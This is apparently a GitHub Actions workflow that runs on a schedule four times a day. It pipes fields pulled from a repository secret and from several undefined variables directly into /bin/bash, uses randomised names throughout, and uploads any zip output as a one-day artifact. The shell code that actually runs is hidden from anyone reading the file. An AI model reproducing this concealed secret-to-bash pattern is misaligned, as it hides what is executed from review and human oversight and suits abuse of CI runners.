name: xianggehunbai
on:
  workflow_dispatch:

  schedule:
    - cron: '1 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianggehunbai
        env:
          ftuuv61: ${{ secrets.ftuuv61 }}
        run: |
          printf '%s' "$ftuuv61" | jq -r .nwb64561 | /bin/bash
          echo $zir78604 | jq -r .guv74726 | /bin/bash
          printf '%s' "$pxao2" | jq -r .php79742 | /bin/bash
          printf '%s' "$dr8040" | jq -r .t458 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: gEqkM7Wz
          path: "*.zip"
          retention-days: 1
